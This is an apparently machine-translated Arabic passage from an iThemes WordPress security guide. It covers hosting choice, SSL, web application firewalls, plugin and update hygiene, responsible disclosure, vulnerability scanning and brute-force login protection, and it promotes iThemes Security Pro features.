في هذا القسم ، تعلمنا العديد من العناصر المهمة لأمان WordPress ، بما في ذلك دوافع المتسللين ، وأنواع الاختراق المختلفة ، ونقاط الضعف التي يستغلها مجرمو الإنترنت ، وكيفية التخفيف من مخاطر الثغرات ، وكيفية تحديد المخاطر التي تشكلها الثغرة الأمنية على موقعك. موقع الكتروني.

إن فهم كيفية محاولة المهاجمين اختراق مواقعنا الإلكترونية وهدفهم بعد اختراق مواقعنا يتيح لنا بناء الدفاعات المناسبة.

في الأقسام القادمة ، ستتعلم كيف يمكنك حماية موقع الويب الخاص بك من كل أنواع الهجمات التي يمكن أن يلقيها المتسلل عليك.

القسم 4: تأمين الخادم الخاص بك

تتمثل الخطوة الأولى في إستراتيجية أمان WordPress في تأمين الخادم الخاص بك. يخزن الخادم الخاص بك جميع الملفات والرموز التي تجعل موقع الويب الخاص بك يعمل.

ستتعلم في هذا القسم:

1. أهمية اختيار مضيف جيد.
2. كيفية تشفير الاتصالات على موقع الويب الخاص بك.
3. كيف يمكن لجدار الحماية أن يساعد في تأمين موقعك.

اختر الاستضافة المناسبة

لا يتم إنشاء جميع مضيفي الويب على قدم المساواة ، ويمكن أن يؤدي اختيار واحد فقط على السعر إلى تكلفتك أكثر على المدى الطويل مع مشكلات أمان WordPress. معظم بيئات الاستضافة المشتركة آمنة ، لكن بعضها لا يفصل بين حسابات المستخدمين بشكل كافٍ.

يجب أن يكون مضيفك يقظًا بشأن تطبيق أحدث تصحيحات الأمان واتباع أفضل ممارسات أمان استضافة WordPress المهمة الأخرى المتعلقة بأمان الخادم والملفات. يجب أن يكون مضيفك يقظًا بشأن تطبيق أحدث تصحيحات الأمان واتباع أفضل ممارسات أمان الاستضافة المهمة الأخرى المتعلقة بأمان الخادم والملفات.

قم بتشفير موقع WordPress الخاص بك باستخدام SSL

طبقة مآخذ التوصيل الآمنة ، المعروفة أيضًا باسم SSL ، هي تقنية أمان توفر التشفير بين العميل وخادم الويب. لفهم هذا الأمر بشكل أكثر بساطة ، "العميل" هو متصفح ويب مثل Chrome أو Safari ، و "خادم الويب" هو موقع الويب الخاص بك أو متجرك عبر الإنترنت.

هناك طريقة سهلة لمعرفة ما إذا كان موقع الويب الذي تزوره يحتوي على شهادة SSL مثبتة أم لا ، وهي البحث في شريط عنوان المتصفح الخاص بك لمعرفة ما إذا كان عنوان URL يبدأ بـ HTTP أو HTTPS. إذا كان عنوان URL يبدأ بـ HTTPS ، فأنت تتصفح بأمان موقع باستخدام SSL.

ما سبب أهمية SSL؟

يعد عدم الحصول على شهادة SSL في عام 2021 أمرًا مكلفًا. لماذا ا؟ إذا لم يكن لديك SSL ممكّنًا على موقع الويب الخاص بك ، فسيكون من الصعب على العملاء المحتملين اكتشاف وجودك ، وقد يخشى أولئك الذين يجدون موقعك من إعطائك أي أموال.

في أي وقت نقوم بعملية شراء عبر الإنترنت ، هناك اتصال يحدث بين متصفحك والمتجر عبر الإنترنت. على سبيل المثال ، عندما ندخل رقم بطاقة الائتمان الخاصة بنا في متصفحنا ، سيقوم متصفحنا بمشاركة الرقم مع المتجر عبر الإنترنت. بعد أن يتلقى المتجر الدفعة ، فإنه يخبر متصفحك لإعلامك بنجاح عملية الشراء.

هناك شيء واحد يجب مراعاته بشأن المعلومات التي تتم مشاركتها بين متصفحنا وخادم المتجر وهو أن المعلومات تتوقف عدة مرات أثناء النقل. توفر طبقة المقابس الآمنة تشفيرًا للاتصالات لضمان عدم رؤية بطاقة الائتمان الخاصة بنا حتى تصل إلى الوجهة النهائية لخادم المتجر.

لفهم كيفية عمل التشفير بشكل أفضل ، فكر في كيفية تسليم مشترياتنا. إذا سبق لك أن تتبعت حالة التسليم لعملية شراء عبر الإنترنت ، فستلاحظ أن طلبك توقف عدة مرات قبل وصوله إلى منزلك. إذا لم يقم البائع بتغليف مشترياتك بشكل صحيح ، فسيكون من السهل على الأشخاص رؤية ما اشتريته.

SSL هي أداة مهمة في منع الأشرار من اعتراض المعلومات الحساسة مثل كلمات المرور وأرقام بطاقات الائتمان التي تتم مشاركتها بين العميل وخادم الويب.

لماذا تعتبر شهادة SSL ضرورية لكل موقع؟

تعد مزايا أمان WordPress التي تكسبها من الحصول على شهادة SSL على موقع الويب الخاص بك كافية لجعلها ضرورية لأي موقع ويب. ومع ذلك ، لتشجيع الجميع على حماية زوار مواقعهم ، خلقت متصفحات الويب ومحركات البحث حوافز سلبية لتشجيع الجميع على استخدام SSL. في هذا القسم ، سوف نغطي العواقب المكلفة لعدم تمكين SSL على موقع الويب الخاص بك.

1. عدم تمكين SSL سيؤذي تصنيفات SEO الخاصة بك

تحسين محرك البحث أو تحسين محركات البحث (SEO) هي عملية تحسين موقع الويب الخاص بك ليتم اكتشافه بشكل عضوي من خلال صفحات نتائج محرك البحث. تكمن فائدة مُحسّنات محرّكات البحث في أنها طريقة ممتازة لزيادة حركة المرور العضوية وغير المدفوعة إلى موقعك. إذا كنت تبيع دورة خبز الخبز ، فأنت تريد أن يكون موقع الويب الخاص بك في الصفحة الأولى من النتائج لشخص يبحث في Google ، أو Duck Duck Go لدورة خبز الخبز.

بدون تمكين SSL على موقعك ، ستعاقبك محركات البحث وتخفض تصنيفك. أحد المقاييس التي يستخدمها Google لتصنيف مواقع الويب في نتائج البحث هو الجدارة بالثقة. من مصلحة Google عدم إرسال مستخدميها إلى مواقع ويب غير آمنة ، لذا فإن الجدارة بالثقة لها وزن كبير في خوارزمية الترتيب الخاصة بهم. مع إضافة SSL الكثير من الأمان ، يعد جزءًا مهمًا من كيفية حصول Google على مصداقية موقع الويب.

2. المتصفحات تضع علامة على المواقع غير SSL على أنها غير آمنة

هناك طريقة أخرى لعدم تفعيل SSL وهي أن متصفح الزائر الخاص بك سوف يحذره من أن موقعك ليس آمنًا. كما ذكرنا سابقًا ، بعد تثبيت شهادة SSL على موقع الويب الخاص بك ، سيتغير عنوان URL لموقعك من http : //yourwebsite.com إلى https: // yourwebsite / com. Chrome ، على سبيل المثال ، سيضع علامة على صفحات الويب المشفرة باستخدام HTTPS على أنها آمنة باستخدام قفل مقفل. بدلاً من ذلك ، سيحل Chrome محل القفل المقفل لجميع صفحات الويب غير المشفرة باستخدام HTTP بالنص Not Secure .

لن أتسوق على مواقع الويب التي تم وضع علامة عليها على أنها غير آمنة بواسطة المتصفح ، ولست الوحيد الذي لا يفعل ذلك. وفقًا لدراسة أجرتها GlobalSign ، يتجنب 85 ٪ من المتسوقين عبر الإنترنت المواقع غير الآمنة. ضع في اعتبارك أنه في عام 2021 ، من الضروري أن تستخدم جميع مواقعك HTTPS وليس فقط صفحات تسجيل الدخول والخروج الخاصة بك. لا يجوز للعميل المحتمل الوصول إلى عملية دفع آمنة إذا تم تمييز صفحات المتجر على أنها غير آمنة بواسطة متصفح الويب الخاص بهم.

3. يمكنك أن تفقد العملاء المحتملين

حماية عملائك هي السبب الأساسي لتمكين SSL على موقع الويب الخاص بك. إذا كانوا على استعداد لتكليفك بأعمالهم ، فأقل ما يمكنك فعله هو مكافأة تلك الثقة من خلال حمايتهم بقوة التشفير.

إذا تمكن أحد المتسللين من سرقة تفاصيل بطاقة ائتمان عميلك بسبب نقص التشفير على موقع الويب الخاص بك ، فلن تفقد ثقتهم فحسب ، بل ستفقد أيًا من أعمالهم المستقبلية.

كيف يمكنني معرفة ما إذا كان موقع الويب الخاص بي قد تم تمكين SSL؟

من الطرق السهلة لمعرفة ما إذا كان موقع الويب الخاص بك يحتوي على شهادة SSL مثبتة هو البحث في شريط عنوان المتصفح لمعرفة ما إذا كان عنوان URL يبدأ بـ HTTP أو HTTPS. إذا كان عنوان URL يبدأ بـ HTTPS ، فسيتم تأمين موقع الويب الخاص بك باستخدام SSL.

يمكنك أيضًا استخدام مدقق SSL مثل SSL Labs. سيقوم مدقق SSL بفحص موقعك بحثًا عن شهادة SSL وسيعلمك عندما يتم تعيين شهادة SSL الخاصة بك على انتهاء الصلاحية.

كيف يمكنني تثبيت شهادة SSL على موقع الويب الخاص بي على WordPress؟

إذا كان موقع WordPress الخاص بك يفتقر إلى SSL ، فإن أول شيء يجب عليك فعله هو أن تطلب من مزود الاستضافة معرفة ما إذا كان يوفر شهادة وتكوين SSL مجانيين. في عام 2021 ، تقوم معظم شركات الاستضافة بتضمين SSL في حزم الاستضافة الخاصة بهم. على سبيل المثال ، يوفر iThemes Hosting ويدير SSL لكل موقع ويب.

إذا لم يزودك مضيفك بشهادة SSL مجانية ، فلا تقلق ، فلا يزال هناك الكثير من الخيارات الأخرى.

تقدم Cloudflare شهادة SSL مشتركة مجانية لمواقع WordPress. إذا كنت تفضل عدم الحصول على شهادة SSL مشتركة وكنت مرتاحًا لسطر الأوامر ، فإن CertBot يعد خيارًا ممتازًا. لا يُنشئ Certbot شهادة SSL مجانية فقط باستخدام Let's Encrypt نيابة عنك ، ولكنه سيدير ​​أيضًا تجديد الشهادة تلقائيًا نيابةً عنك.

يعد تمكين SSL على موقع WordPress الخاص بك أمرًا ضروريًا في عام 2021. يؤمن SSL الاتصال بينك وبين عملائك ، ويحسن مُحسّنات محرّكات البحث ، ويمنح زوار موقعك الراحة بأنهم آمنون أثناء تصفح موقع الويب الخاص بك.

استخدم جدار حماية تطبيق الويب

يعد استخدام جدار حماية تطبيق الويب طريقة رائعة لإضافة طبقة أخرى من الحماية إلى موقع الويب الخاص بك على WordPress.

ما هو جدار حماية تطبيقات الويب؟

يساعد جدار حماية تطبيق الويب أو WAF على تأمين موقع الويب الخاص بك عن طريق مراقبة حركة مرور الإنترنت المتوجهة إلى موقع الويب الخاص بك قبل أن يصل إلى موقع الويب الخاص بك.

بإضافة WAF أمام WordPress ، فأنت تضيف نقطة تفتيش أمنية بين الإنترنت وموقع الويب الخاص بك. قبل أن تتمكن حركة المرور من الوصول إلى موقع الويب الخاص بك ، يجب أن تمر عبر WAF.

إذا اكتشف WAF أي حركة مرور ضارة - مثل CSRF و XSS و SQL Injections والمزيد - فسيتم تصفيتها قبل أن تصل إلى موقع الويب الخاص بك. ليس ذلك فحسب ، بل يمكن لـ WAF المساعدة في اكتشاف هجوم DDoS وتنفيذ تحديد معدل لمنع موقع الويب الخاص بك من التعطل.

3 طرق لتنفيذ WAF

هناك 3 طرق مختلفة يمكنك من خلالها تنفيذ WAF. دعنا نلقي نظرة على إيجابيات وسلبيات كل نوع.

1. WAF المعتمد على الشبكة - WAF القائم على الشبكة أو المادي هو أساس الأجهزة. المؤيد الرئيسي لـ WAF المستندة إلى الشبكة هو زمن الانتقال المنخفض الذي يأتي من التثبيت محليًا. ومع ذلك ، فإن المخالفات تأتي من سعر تخزين المعدات المادية وصيانتها. تجعل متطلبات السعر والتخزين المادي هذا خيارًا سيئًا لمعظم الناس.
2. WAF المستندة إلى المضيف - يتم دمج WAF القائم على المضيف أو المحلي في WordPress ، عادةً باستخدام مكون إضافي. المؤيد لـ WAF القائم على المضيف هو أنه أقل تكلفة من WAF القائم على الشبكة. يعيق WAF المحلي متطلبات موارد الخادم الخاص بك. ومع حدوث تصفية حركة المرور على موقع الويب الخاص بك ، يمكن أن يؤدي ذلك إلى إبطاء أوقات تحميل الصفحة لزوار موقع الويب الخاص بك.
3. WAF المستندة إلى السحابة - عادةً ما يكون WAF المستند إلى مجموعة النظراء هو الخيار الأفضل لمعظم الأشخاص. المؤيد لـ WAF المستندة إلى السحابة هو أنها ميسورة التكلفة ، ولا تتطلب منك إدارتها. بالإضافة إلى ذلك ، مع تصفية حركة المرور قبل أن تصل إلى موقع الويب الخاص بك ، فإنها لن تمتص موارد الخادم وتبطئ موقع الويب الخاص بك. Cloudflare و Sucuri من أشهر مزودي جدار الحماية المستندة إلى السحابة.

تغليف

في هذا القسم ، تعلمنا سبب أهمية اختيار المضيف المناسب ، وكيفية تأمين الاتصال بين موقعنا الإلكتروني وزواره ، وكيف يمكن لـ WAF أن يساعد في منع حركة المرور الضارة من الوصول إلى موقعنا.

في القسم التالي ، ستتعلم أفضل الممارسات للحفاظ على أمان برنامج WordPress الخاص بك.

القسم 5: أمان برامج WordPress

في كل مرة تقوم فيها بتثبيت مكون إضافي أو سمة جديدة ، فإنك تقدم رمزًا جديدًا من المحتمل أن يستغل من قبل المتسللين. في هذا القسم ، سوف تتعلم ما يجب فعله وما لا يجب فعله فيما يتعلق بإدارة WordPress والإضافات والقوالب.

1. قم بتثبيت البرامج من مصادر موثوقة فقط

قم بتثبيت الإضافات والسمات WordPress فقط من مصادر موثوقة. يجب عليك فقط تثبيت البرامج التي تحصل عليها من WordPress.org ، أو المستودعات التجارية المعروفة ، أو مباشرة من المطورين ذوي السمعة الطيبة. ستحتاج إلى تجنب الإصدار "الفارغ" من المكونات الإضافية التجارية لأنها يمكن أن تحتوي على تعليمات برمجية ضارة. لا يهم كيف تقوم بإغلاق موقع WordPress الخاص بك إذا كنت من يقوم بتثبيت البرامج الضارة.

إذا لم يتم توزيع مكون WordPress الإضافي أو القالب على موقع المطور ، فستحتاج إلى بذل العناية الواجبة قبل تنزيل المكون الإضافي. تواصل مع المطورين لمعرفة ما إذا كانوا ينتمون بأي شكل من الأشكال إلى موقع الويب الذي يقدم منتجاتهم بسعر مجاني أو مخفض.

2. إزالة البرنامج المساعد والسمات غير المستخدمة

يعد وجود مكونات إضافية وموضوعات غير مستخدمة أو غير نشطة على موقع الويب الخاص بك خطأ أمانًا كبيرًا في WordPress. كل جزء من الكود على موقع الويب الخاص بك هو نقطة دخول محتملة للمتسلل.

من الشائع للمطورين استخدام كود الطرف الثالث - مثل مكتبات JS - في المكونات الإضافية والسمات الخاصة بهم. لسوء الحظ ، إذا لم تتم صيانة المكتبات بشكل صحيح ، فيمكنها إنشاء نقاط ضعف يمكن للمهاجمين الاستفادة منها لاختراق موقع الويب الخاص بك.

ملاحظة: استخدم iThemes Sync Pro Site Audit للتحقق من صفحات الويب الخاصة بك بحثًا عن مكتبات JavaScript الأمامية ذات الثغرات الأمنية المعروفة.

قم بإلغاء تثبيت وإزالة أي مكونات إضافية وموضوعات غير ضرورية على موقع WordPress الخاص بك للحد من عدد نقاط الوصول والكود القابل للتنفيذ على موقع الويب الخاص بك.

3. حافظ على تحديث برنامج WordPress الخاص بك

يعد الحفاظ على تحديث البرامج جزءًا أساسيًا من أي استراتيجية أمان في WordPress. التحديثات ليست فقط لإصلاحات الأخطاء والميزات الجديدة. يمكن أن تتضمن التحديثات أيضًا تصحيحات أمان مهمة. بدون هذا التصحيح ، فإنك تترك هاتفك أو جهاز الكمبيوتر أو الخادم أو جهاز التوجيه أو موقع الويب عرضة للهجوم.

يعد وجود مكون إضافي أو سمة ضعيفة يتوفر لها التصحيح ولكن لم يتم تطبيقها هو الجاني الأول لمواقع WordPress التي تم اختراقها. هذا يعني أنه يتم استغلال معظم الثغرات الأمنية بعد إصدار تصحيح للثغرة الأمنية.

كان من الممكن منع اختراق Equifax المبلغ عنه بشكل كبير إذا قاموا بتحديث برامجهم. بالنسبة لخرق Equifax ، لم يكن هناك ببساطة أي عذر.

يمكن أن يحميك شيء بسيط مثل تحديث برنامجك. لذلك لا تتجاهل تحديثات WordPress هذه - التحديثات هي أحد المكونات الأساسية لأمن WordPress وجميع أمان الويب.

التصحيح الثلاثاء

يوم الثلاثاء التصحيح هو المصطلح غير الرسمي للإشارة إلى إصلاحات الأخطاء والأمان العادية التي تصدرها Microsoft في الثلاثاء الثاني من كل شهر. إنه لأمر رائع أن تقوم Microsoft بإصدار إصلاحات أمنية على مثل هذا الإيقاع الموثوق. يعد يوم الثلاثاء التصحيح أيضًا هو اليوم الذي يتم فيه الكشف عن الثغرات الأمنية التي يتم الكشف عنها علنًا عن طريق تصحيحات Microsoft.

تحقق من قسم ما يجب تحديثه وكيفية أتمتة تحديثاتك في الدليل النهائي لأمن WordPress في الكتاب الإلكتروني لعام 2020 لمعرفة كيفية تطبيق تحديثات يوم الثلاثاء تلقائيًا.

استغلال الأربعاء

في يوم الأربعاء التالي ليوم الثلاثاء ، من الشائع رؤية العديد من المهاجمين يستغلون ثغرة أمنية معروفة سابقًا على أنظمة قديمة وغير مصححة. لذلك ، تمت صياغة يوم الأربعاء الذي يلي يوم الثلاثاء التصحيح بشكل غير رسمي باعتباره Exploit Wednesday.

لماذا يستهدف المتسللون الثغرات المصححة؟

يستهدف المتسللون نقاط الضعف المصححة لأنهم يعرفون أن الأشخاص لا يقومون بالتحديث (بما في ذلك المكونات الإضافية والسمات على موقع الويب الخاص بك). يعد الكشف علنًا عن نقاط الضعف في يوم تصحيحها معيارًا صناعيًا. بعد الكشف العلني عن الثغرة الأمنية ، تصبح الثغرة "ثغرة أمنية معروفة" للإصدارات القديمة وغير المصححة من البرنامج. البرامج ذات الثغرات الأمنية المعروفة هي هدف سهل للقراصنة.

يحب المتسللون الأهداف السهلة ، وامتلاك برنامج به نقاط ضعف معروفة يشبه تسليم المتسلل التعليمات خطوة بخطوة لاقتحام موقع WordPress أو الخادم أو الكمبيوتر أو أي جهاز آخر متصل بالإنترنت.

الإفصاح المسؤول

قد تتساءل عن سبب الكشف عن ثغرة أمنية إذا كانت تمنح المتسللين فرصة للهجوم. حسنًا ، من الشائع جدًا أن يقوم الباحث الأمني ​​باكتشاف الثغرة الأمنية والإبلاغ عنها بشكل خاص إلى مطور البرامج.

مع الإفصاح المسؤول ، يتم إعداد التقرير الأولي للباحث بشكل خاص لمطوري الشركة التي تمتلك البرنامج ، ولكن مع الاتفاق على نشر التفاصيل الكاملة بمجرد إتاحة التصحيح. بالنسبة إلى الثغرات الأمنية الكبيرة ، قد يكون هناك تأخير طفيف في الكشف عن الثغرة لمنح المزيد من الأشخاص الوقت للتصحيح.

قد يوفر الباحث الأمني ​​موعدًا نهائيًا لمطور البرامج للرد على التقرير أو تقديم تصحيح. إذا لم يتم الوفاء بهذا الموعد النهائي ، فقد يكشف الباحث علنًا عن الثغرة الأمنية للضغط على المطور لإصدار تصحيح.

قد يبدو الكشف علنًا عن ثغرة أمنية وتقديم Zero Day - وهو نوع من الثغرات الأمنية التي لا تحتوي على رقعة ويتم استغلاله في البرية - يؤدي إلى نتائج عكسية. لكنها الرافعة الوحيدة التي يجب على الباحث الضغط عليها للضغط على المطور لإصلاح الثغرة الأمنية.

إذا اكتشف المتسلل الثغرة الأمنية ، فيمكنه استخدام برنامج Exploit بهدوء والتسبب في ضرر للمستخدم النهائي (هذا أنت) ، بينما يظل مطور البرامج محتفظًا بترك الثغرة الأمنية دون إصلاح.

يحتوي Project Zero من Google على إرشادات مماثلة عندما يتعلق الأمر بالكشف عن نقاط الضعف. ينشرون التفاصيل الكاملة للثغرة الأمنية بعد 90 يومًا سواء تم تصحيحها أم لا.

تعلم التحديث: الطريق الصعب

في نهاية عام 2018 ، كان المتسللون يستفيدون بنشاط من إحدى الثغرات الموجودة في المكون الإضافي WP GDPR Compliance. سمح برنامج Exploit للمستخدمين غير المصرح لهم - الأشخاص الذين لم يسجلوا الدخول إلى موقع ويب - بتعديل إعدادات تسجيل مستخدم WP وتغيير دور المستخدم الافتراضي الجديد من مشترك إلى مسؤول. لحسن الحظ ، تصرف مطورو البرنامج الإضافي WP GDPR Compliance بسرعة وأصدروا تصحيحًا للثغرة الأمنية في اليوم التالي للإفصاح عنها للجمهور.

ولكن ، تمامًا كما هو الحال مع Exploit Wednesday ، استهدف المتسللون الثغرة الأمنية على الرغم من إصدار التصحيح. في الأيام والأسابيع التي أعقبت الكشف عن الثغرات الأمنية الخاصة بـ WP GDPR Compliance ، تلقينا سلسلة من التقارير التي تفيد بأن مواقع WordPress قد تم اختراقها من قبل المهاجمين الذين يستغلون الثغرة الأمنية.

يعد وجود مكون إضافي أو سمة ضعيفة يتوفر لها التصحيح ولكن لم يتم تطبيقها هو الجاني الأول لمواقع WordPress التي تم اختراقها. هذا محبط جدا !!!!! هذا يعني أنه كان من الممكن منع معظم عمليات اختراق الفسفور الابيض.

إنه لأمر مزعج أن نفكر في كل الأشخاص الذين أنفقوا أطنانًا من المال لتنظيف موقع الويب الخاص بهم ، والعائد الذي فقدوه أثناء تعطل مواقعهم ، والإيرادات المستقبلية التي خسروها لفقدان ثقة عملائهم. يجعل الأمر أكثر إزعاجًا عندما تعلم أنه كان من الممكن منع كل هذا الألم من خلال تحديث بسيط.

تجعل ميزة إدارة الإصدار iThemes Security Pro من تخصيص تحديثات WordPress وأتمتتها.

4. تتبع نقاط الضعف في WordPress

لن يحميك تحديث المكونات الإضافية والسمات الخاصة بك من كل ثغرة أمنية في WordPress. تم التخلي عن بعض الإضافات والسمات في WordPress من قبل المطورين الذين قاموا بإنشائها.

لسوء الحظ ، إذا كانت هناك ثغرة أمنية لمكوّن إضافي أو سمة تم التخلي عنها ، فلن يتم تصحيحها أبدًا. سيستهدف المتسللون مواقع الويب التي تستخدم هذه المكونات الإضافية التي تكون عرضة للخطر بشكل دائم.

إذا كان لديك مكون إضافي مهجور به ثغرة أمنية معروفة على موقع الويب الخاص بك ، فأنت تمنح المتسللين المخططات التي يحتاجونها للسيطرة على موقع الويب الخاص بك. لهذا السبب يجب عليك تتبع أحدث نقاط الضعف.

من الصعب تتبع كل ثغرة أمنية تم الكشف عنها في WordPress ومقارنة تلك القائمة بإصدارات المكونات الإضافية والسمات التي قمت بتثبيتها على موقع الويب الخاص بك. تتبع الثغرات الأمنية هو الفرق بين امتلاك موقع آمن مقابل موقع يمكن للقراصنة استغلاله بسهولة.

أخبار جيدة بالنسبة لك! نحن نتتبع ونشارك كل ثغرة أمنية تم الكشف عنها في تقارير الثغرات الأمنية في WordPress الخاصة بنا.

5. افحص موقع الويب الخاص بك بحثًا عن نقاط الضعف

تتمثل الطريقة الأسرع لحماية موقع الويب الخاص بك من عمليات استغلال القراصنة السهلة في استخدام عمليات الفحص الآلي للتحقق من مواقع الويب الخاصة بك بحثًا عن نقاط الضعف المعروفة.

يعد برنامج iThemes Security Pro Site Scanner طريقك لأتمتة حماية الثغرات الأمنية على جميع مواقع WordPress الخاصة بك. يقوم Site Scanner بفحص موقعك بحثًا عن نقاط ضعف معروفة وسيقوم تلقائيًا بتطبيق تصحيح إذا كان متاحًا.

يتحقق موقع iThemes Security Pro من 3 أنواع من الثغرات الأمنية.

1. ثغرات WordPress
2. ثغرات البرنامج المساعد
3. ثغرات الموضوع

تعمل ميزة iThemes Sync Pro Site Audit على تعزيز قوة Google Lighthouse لحماية موقع الويب الخاص بك. يفحص Site Audit ويضع علامة على الصفحات التي تتضمن مكتبات JavaScript أمامية بها ثغرات أمنية معروفة.

من الشائع للمطورين استخدام كود الطرف الثالث - مثل مكتبات JS - في المكونات الإضافية والسمات الخاصة بهم. لسوء الحظ ، إذا لم تتم صيانة المكتبات بشكل صحيح ، فيمكنها إنشاء نقاط ضعف يمكن للمهاجمين الاستفادة منها لاختراق موقع الويب الخاص بك. استخدام المكونات ذات الثغرات الأمنية المعروفة مدرج في قائمة OWASP Top 10.

لقد أنقذت مراجعة الموقع لحم الخنزير المقدد الخاص بي! لقد أنشأت جدول تدقيق لجعل Sync Pro تجري عمليات تدقيق آلية أسبوعية وإرسال تقارير التدقيق إليّ بالبريد الإلكتروني. أحتفظ بكل شيء محدثًا ، ولهذا السبب صدمت عندما رأيت في إحدى عمليات تدقيق موقع الويب الخاص بي أنني كنت أستخدم مكتبات JavaScript بها ثغرات أمنية معروفة.

أشار التقرير إلى إصدار قديم من jQuery في دليل WordPress الخاص بالموقع مليء بنقاط الضعف المعروفة! من حسن حظي أنني رأيت في Sync Pro Site Audit أنني كنت أستخدم مكتبات JavaScript بها ثغرات أمنية معروفة وتمكنت من حل المشكلة قبل اختراق موقع الويب الخاص بي.

تغليف

ستؤدي الإدارة الصحيحة للبرنامج الذي يعمل على تشغيل موقع الويب الخاص بك ، بما في ذلك مكونات WordPress الإضافية والسمات ونواة WordPress ، إلى قطع شوط طويل في إستراتيجية أمان WordPress الخاصة بك ، مما يؤدي إلى تأمين موقع الويب الخاص بك ضد المهاجمين عبر الإنترنت.

القسم 6: تأمين تسجيل الدخول إلى WordPress الخاص بك

عنوان URL لتسجيل الدخول إلى WordPress هو نفسه لكل موقع WordPress ، ولا يتطلب أي أذونات خاصة للوصول إليه. يعرف أي شخص لديه أي خبرة في العمل مع WordPress أن عنوان URL لتسجيل الدخول موجود في صفحة /wp-login.php .

إن إمكانية الوصول إلى صفحة تسجيل الدخول إلى WordPress تجعلها الجزء الأكثر هجومًا - وربما الأكثر عرضة للخطر - في أي موقع ويب WordPress. لحسن الحظ بالنسبة لنا ، فإن المكون الإضافي iThemes Security Pro يجعل من السهل تأمين تسجيل الدخول إلى WordPress الخاص بك.

دعنا نلقي نظرة على الأدوات الموجودة في iThemes Security Pro والتي يمكنك استخدامها لتأمين تسجيل الدخول إلى WordPress الخاص بك وجعله غير قابل للاختراق تقريبًا!

1. الحد من محاولات تسجيل الدخول

تتمثل الخطوة الأولى لتأمين تسجيل الدخول إلى WordPress في الحد من محاولات تسجيل الدخول الفاشلة. بشكل افتراضي ، لا يوجد أي شيء مضمّن في WordPress للحد من عدد محاولات تسجيل الدخول الفاشلة التي يمكن لشخص ما القيام بها. بدون حد لعدد محاولات تسجيل الدخول الفاشلة التي يمكن للمهاجم القيام بها ، يمكنهم الاستمرار في تجربة مجموعة من أسماء المستخدمين وكلمات المرور المختلفة حتى يعثروا على واحدة تعمل.

تحافظ ميزة الحماية من القوة الغاشمة المحلية في iThemes Security Pro على مسارات محاولات تسجيل الدخول غير الصالحة التي يقوم بها مضيف أو عنوان IP واسم مستخدم. بمجرد قيام IP أو اسم المستخدم بإجراء العديد من محاولات تسجيل الدخول غير الصالحة المتتالية ، سيتم حظرهم وسيتم منعهم من إجراء أي محاولات أخرى لفترة زمنية محددة.

لبدء استخدام ميزة Local Brute Force Protection ، قم بتمكينها في الصفحة الرئيسية لصفحة إعدادات iThemes Security Pro.

تسمح لك إعدادات الحماية من القوة الغاشمة المحلية بتعيين حدود عمليات الإغلاق.

• الحد الأقصى لعدد محاولات تسجيل الدخول لكل مضيف - عدد محاولات تسجيل الدخول غير الصحيحة المسموح بها لعنوان IP قبل أن يتم قفله.
• الحد الأقصى لعدد محاولات تسجيل الدخول لكل مستخدم - هذا هو عدد محاولات تسجيل الدخول غير الصالحة التي يُسمح بها لاسم المستخدم قبل أن يتم قفله.
• دقائق لتذكر تسجيل الدخول السيئ - هذه هي المدة التي يجب أن تحتسب فيها محاولة تسجيل الدخول غير الصالحة ضد عنوان IP أو اسم مستخدم للإغلاق.
• حظر مستخدم "المسؤول" تلقائيًا - عند التمكين ، يتلقى أي شخص يستخدم اسم مستخدم المسؤول عند تسجيل الدخول قفلًا تلقائيًا.

هناك بعض الأشياء التي تريد وضعها في الاعتبار عند تكوين إعدادات التأمين. أنت تريد نقل محاولات تسجيل دخول غير صالحة للمستخدمين أكثر مما تقدمه لعناوين IP. لنفترض أن موقع الويب الخاص بك يتعرض لهجوم عنيف وأن المهاجم يستخدم اسم المستخدم الخاص بك. الهدف هو قفل عنوان IP الخاص بالمهاجم وليس اسم المستخدم الخاص بك ، لذلك ستظل قادرًا على تسجيل الدخول وإنجاز العمل ، حتى عندما يتعرض موقع الويب الخاص بك للهجوم.

لا تريد أيضًا أن تجعل هذه الإعدادات شديدة الصرامة عن طريق تعيين عدد محاولات تسجيل الدخول غير الصالحة منخفضًا جدًا ووقت تذكر المحاولات غير الصالحة لفترة طويلة جدًا. إذا قمت بتخفيض عدد محاولات تسجيل الدخول غير الصالحة للمضيفين / عناوين IP إلى 1 وقمت بتعيين الدقائق لتذكر محاولة تسجيل دخول خاطئة لمدة شهر ، فأنت تزيد بشكل كبير من احتمال حظر المستخدمين الشرعيين عن غير قصد.

2. الحد من محاولات المصادقة الخارجية لكل طلب

هناك طرق أخرى لتسجيل الدخول إلى WordPress إلى جانب استخدام نموذج تسجيل الدخول. باستخدام XML-RPC ، يمكن للمهاجم إجراء المئات من أسماء المستخدمين ومحاولات كلمة المرور في طلب HTTP واحد. تسمح طريقة تضخيم القوة الغاشمة للمهاجمين بإجراء الآلاف من محاولات اسم المستخدم وكلمة المرور باستخدام XML-RPC في عدد قليل من طلبات HTTP.

باستخدام إعدادات WordPress Tweaks الخاصة بـ iThemes Security Pro ، يمكنك حظر محاولات مصادقة متعددة لكل طلب XML-RPC. سيؤدي تحديد عدد محاولات اسم المستخدم وكلمة المرور إلى محاولة واحدة لكل طلب إلى قطع شوط طويل في تأمين تسجيل الدخول إلى WordPress الخاص بك.

3. شبكة حماية القوة الغاشمة

إن الحد من محاولات تسجيل الدخول هو كل شيء عن حماية القوة الغاشمة المحلية. تبحث حماية القوة الغاشمة المحلية فقط في محاولات الوصول إلى موقعك وتحظر المستخدمين وفقًا لقواعد التأمين المحددة في إعدادات الأمان الخاصة بك.

تأخذ حماية القوة الغاشمة للشبكة هذه خطوة إلى الأمام. الشبكة هي مجتمع iThemes Security وتضم أكثر من مليون موقع ويب قوي. إذا تم تحديد عنوان IP على أنه يحاول اقتحام مواقع الويب في مجتمع iThemes Security ، فسيتم إضافة عنوان IP إلى قائمة Network Bruce Force المحظورة.

بمجرد أن يكون عنوان IP في قائمة Network Brute Force المحظورة ، يتم حظر عنوان IP على جميع مواقع الويب في الشبكة. لذلك ، إذا هاجم عنوان IP موقع الويب الخاص بي وتم حظره ، فسيتم إبلاغ iThemes Security Brute Force Network. يمكن أن يساعد تقريري في حظر عنوان IP على الشبكة بالكامل. أحب أنه يمكنني المساعدة في تأمين تسجيل دخول الآخرين إلى WordPress فقط من خلال تمكين حماية شبكة أمان iThemes.

لبدء استخدام Network Force Protection ، قم بتمكينها في الصفحة الرئيسية لإعدادات الأمان.

